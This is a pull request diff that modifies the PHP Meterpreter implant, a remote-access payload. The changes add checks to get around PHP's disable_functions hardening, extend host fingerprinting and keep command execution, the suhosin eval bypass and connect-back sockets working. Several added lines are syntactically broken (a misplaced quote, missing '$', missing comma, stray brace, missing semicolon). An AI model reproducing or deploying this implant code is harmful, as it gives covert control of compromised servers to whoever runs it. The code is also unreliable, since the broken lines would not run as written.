### PR TITLE
Improve the php implementation of meterpreter

### DIFF
--- a/php/meterpreter/ext_server_stdapi.php
+++ b/php/meterpreter/ext_server_stdapi.php
@@ -911,6 +911,10 @@ register_command('stdapi_sys_process_execute', COMMAND_ID_STDAPI_SYS_PROCESS_EXE
 function stdapi_sys_process_execute($req, &$pkt) {
     global $channel_process_map, $processes;
 
+    if (!can_call_function('proc_open')) {
+      return ERROR_FAILURE;
+    }
+
     my_print("doing execute");
     $cmd_tlv = packet_get_tlv($req, TLV_TYPE_PROCESS_PATH);
     $args_tlv = packet_get_tlv($req, TLV_TYPE_PROCESS_ARGUMENTS);

--- a/php/meterpreter/ext_server_stdapi.php
+++ b/php/meterpreter/ext_server_stdapi.php
@@ -879,8 +879,17 @@ if (!function_exists('stdapi_sys_config_sysinfo')) {
 register_command('stdapi_sys_config_sysinfo', COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO);
 function stdapi_sys_config_sysinfo($req, &$pkt) {
     my_print("doing sysinfo");
-    packet_add_tlv($pkt, create_tlv(TLV_TYPE_COMPUTER_NAME, php_uname("n")));
-    packet_add_tlv($pkt, create_tlv(TLV_TYPE_OS_NAME, php_uname()));
+    if (can_call_function('php_uname')) {
+      packet_add_tlv($pkt, create_tlv(TLV_TYPE_COMPUTER_NAME, php_uname("n")));
+      packet_add_tlv($pkt, create_tlv(TLV_TYPE_OS_NAME, php_uname()));
+      packet_add_tlv($pkt, create_tlv(TLV_TYPE_ARCHITECTURE, php_uname('m')));
+    }
+    $lang = getenv('LANG');
+    if ($lang !== FALSE) {
+      packet_add_tlv($pkt, create_tlv(TLV_TYPE_LANG_SYSTEM, $lang));
+    } else if (can_call_function('locale_get_default')) {
+      packet_add_tlv($pkt, create_tlv(TLV_TYPE_LANG_SYSTEM, locale_get_default()));
+    }
     return ERROR_SUCCESS;
 }
 }

--- a/php/meterpreter/ext_server_stdapi.php
+++ b/php/meterpreter/ext_server_stdapi.php
@@ -506,7 +506,7 @@ function rmtree($path) {
 
         $subpath = $path . DIRECTORY_SEPARATOR . $dent;
         if (@is_link($subpath)) {
-            $ret = unlink($subpath);
+            $ret = @unlink($subpath);
         } elseif (@is_dir($subpath)) {
             $ret = rmtree($subpath);
         } else {

--- a/php/meterpreter/ext_server_stdapi.php
+++ b/php/meterpreter/ext_server_stdapi.php
@@ -820,15 +820,18 @@ function stdapi_fs_sha1($req, &$pkt) {
 if (!function_exists('stdapi_sys_config_getuid')) {
 register_command('stdapi_sys_config_getuid', COMMAND_ID_STDAPI_SYS_CONFIG_GETUID);
 function stdapi_sys_config_getuid($req, &$pkt) {
-    if (is_callable('posix_getuid')) {
+    if (can_call_function('posix_getuid') && can_call_function('posix_getpwuid')) {
         $uid = posix_getuid();
         $pwinfo = posix_getpwuid($uid);
         $user = $pwinfo['name'];
-    } else {
+    } elseif (can_call_function('get_current_user)') {
         # The posix functions aren't available, this is probably windows.  Use
         # the functions for getting user name and uid based on file ownership
         # instead.
         $user = get_current_user();
+    } else {
+      # Best effort
+      $user = getenv("USER");
     }
     my_print("getuid - returning: " . $user);
     packet_add_tlv($pkt, create_tlv(TLV_TYPE_USER_NAME, $user));

--- a/php/meterpreter/ext_server_stdapi.php
+++ b/php/meterpreter/ext_server_stdapi.php
@@ -418,8 +418,7 @@ function array_prepend($array, $string, $deep=false) {
 
 if (!function_exists('canonicalize_path')) {
 function canonicalize_path($path) {
-    $path = str_replace(array("/", "\\"), DIRECTORY_SEPARATOR, $path);
-    return $path;
+    return str_replace(array("/", "\\"), DIRECTORY_SEPARATOR, $path);
 }
 }
 

--- a/php/meterpreter/meterpreter.php
+++ b/php/meterpreter/meterpreter.php
@@ -670,11 +670,14 @@ if (!function_exists('core_machine_id')) {
   register_command('core_machine_id', COMMAND_ID_CORE_MACHINE_ID);
   function core_machine_id($req, &$pkt) {
     my_print("doing core_machine_id");
-    if (is_callable('gethostname')) {
+    if (can_call_function('gethostname')) {
       # introduced in 5.3
       $machine_id = gethostname();
-    } else {
+    } elseif(can_call_function('php_uname')) {
       $machine_id = php_uname('n');
+    }
+    } else {
+      $machine_id = getenv('HOSTNAME');
     }
     $serial = "";
 

--- a/php/meterpreter/meterpreter.php
+++ b/php/meterpreter/meterpreter.php
@@ -261,8 +261,36 @@ define('COMMAND_ID_CORE_TRANSPORT_SET_TIMEOUTS', 32);
 define('COMMAND_ID_CORE_TRANSPORT_SLEEP', 33);
 # ---------------------------------------------------------------
 
+$GLOBALS['disabled_functions_array'] = array();
+function can_call_function($function){
+  global $disabled_functions_array;
+  if (empty($disabled_functions_array)) {
+    $disabled_functions = @ini_get('disable_functions');
+    if($disabled_functions != ""){
+      $disabled_functions = preg_replace('/[, ]+/', ',', disabled_functions);
+      $disabled_functions_array = array_map('trim', explode(',' disabled_functions));
+    }
+  }
+  if (in_array($function, $disabled_functions_array)) {
+        my_print("Can't call $function, as it's disabled.");
+    return FALSE;
+  }
+  if (!function_exists($function)) {
+        my_print("Can't call $function, as it doesn't exist.");
+    return FALSE;
+  }
+  if (!is_callable($function)) {
+        my_print("Can't call $function, as it's not callable.");
+    return FALSE;
+  }
+  return TRUE;
+}
+
 function my_cmd($cmd) {
-  return shell_exec($cmd);
+  if (can_call_function('shell_exec')) {
+    return shell_exec($cmd);
+  }
+  return '';
 }
 
 function is_windows() {
@@ -519,7 +547,7 @@ if (!function_exists('core_loadlib')) {
     # (for example, suhosin), so we walk around by using `create_function` instead,
     # but since this funcis deprecated since php 7.2+, we're not using it
     # when we can avoid it, since it might leave some traces in the log files.
-    if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) {
+    if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval') && can_call_function('create_function')) {
       $suhosin_bypass=create_function('', $data_tlv['value']);
       $suhosin_bypass();
     } else {
@@ -598,7 +626,7 @@ if (!function_exists('core_negotiate_tlv_encryption')) {
       packet_add_tlv($pkt, create_tlv(TLV_TYPE_SYM_KEY_TYPE, ENC_AES256));
       $GLOBALS['AES_ENABLED'] = false;
       $GLOBALS['AES_KEY'] = rand_bytes(32);
-      if (function_exists('openssl_pkey_get_public') && function_exists('openssl_public_encrypt')) {
+      if (can_call_function('openssl_pkey_get_public') && can_call_function('openssl_public_encrypt')) {
         my_print("Encryption via public key is supported");
         $pub_key_tlv = packet_get_tlv($req, TLV_TYPE_RSA_PUB_KEY);
         if ($pub_key_tlv != null) {
@@ -833,7 +861,7 @@ function generate_req_id() {
 }
 
 function supports_aes() {
-  return function_exists('openssl_decrypt') && function_exists('openssl_encrypt');
+  return can_call_function('openssl_decrypt') && can_call_function('openssl_encrypt');
 }
 
 function decrypt_packet($raw) {
@@ -1111,7 +1139,7 @@ function connect($ipaddr, $port, $proto='tcp') {
 
   # Prefer the stream versions so we don't have to use both select functions
   # unnecessarily, but fall back to socket_create if they aren't available.
-  if (is_callable('stream_socket_client')) {
+  if (can_call_function('stream_socket_client')) {
     my_print("stream_socket_client({$proto}://{$ipaddr}:{$port})");
     if ($proto == 'ssl') {
       $sock = stream_socket_client("ssl://{$ipaddr}:{$port}",
@@ -1129,7 +1157,7 @@ function connect($ipaddr, $port, $proto='tcp') {
       register_stream($sock, $ipaddr, $port);
     }
   } else
-    if (is_callable('fsockopen')) {
+    if (can_call_function('fsockopen')) {
       my_print("fsockopen");
       if ($proto == 'ssl') {
         $sock = fsockopen("ssl://{$ipaddr}:{$port}");
@@ -1138,7 +1166,7 @@ function connect($ipaddr, $port, $proto='tcp') {
       } elseif ($proto == 'tcp') {
         $sock = fsockopen($ipaddr, $port);
         if (!$sock) { return false; }
-        if (is_callable('socket_set_timeout')) {
+        if (can_call_function('socket_set_timeout')) {
           socket_set_timeout($sock, 2);
         }
         register_stream($sock);
@@ -1148,7 +1176,7 @@ function connect($ipaddr, $port, $proto='tcp') {
         register_stream($sock, $ipaddr, $port);
       }
     } else
-      if (is_callable('socket_create')) {
+      if (can_call_function('socket_create')) {
         my_print("socket_create");
         if ($proto == 'tcp') {
           $sock = socket_create($ipf, SOCK_STREAM, SOL_TCP);

--- a/php/meterpreter/meterpreter.php
+++ b/php/meterpreter/meterpreter.php
@@ -822,10 +822,17 @@ function channel_read($chan_id, $len) {
 }
 
 function rand_xor_byte() {
+  if (can_call_function('random_int')) {
+    return chr(random_int(1, 255));
+  }
   return chr(mt_rand(1, 255));
 }
 
 function rand_bytes($size) {
+  if (can_call_function('random_bytes')) {
+    return random_bytes($size)
+  }
+
   $b = '';
   for ($i = 0; $i < $size; $i++) {
     $b .= rand_xor_byte();


### PR DESCRIPTION
- Add a couple of fallbacks
- Add a bunch of proper checks for available/defined/callable functions
- Make use of proper PRNG when available
- Add more information when available